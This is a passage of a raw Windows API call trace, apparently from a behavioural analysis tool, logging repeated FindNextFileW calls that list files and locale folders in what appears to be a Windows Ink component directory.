dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0208.140] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0208.140] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0208.141] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0208.141] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenalm.dat", cAlternateFileName="")) returned 1 [0208.141] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0208.141] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0208.141] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruklm.dat", cAlternateFileName="")) returned 1 [0208.141] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da5853e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3da5853e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d7f6f6e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x21ff00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruksh.dat", cAlternateFileName="")) returned 1 [0208.141] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db89026, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3db89026, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d3cc942, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x30c330, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dbfb43d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3dbfb43d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3da7e69b, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x3ee0d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4bfb78, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x4c4bfb78, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x298e8420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c412911, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c412911, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29a8c2e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x201800, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eab8150, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5eab8150, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe4490e80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkWatson.exe", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700d105, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x7700d105, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe45c2150, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x5da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0208.142] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58cd8515, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x58cd8515, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x5ca35e50, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dc49d13, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5dc49d13, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0208.143] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63de1b63, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x63de1b63, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a991650, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0208.144] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b45ecf9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b45ecf9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0dd120, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x14de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="journal.dll", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0208.145] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: 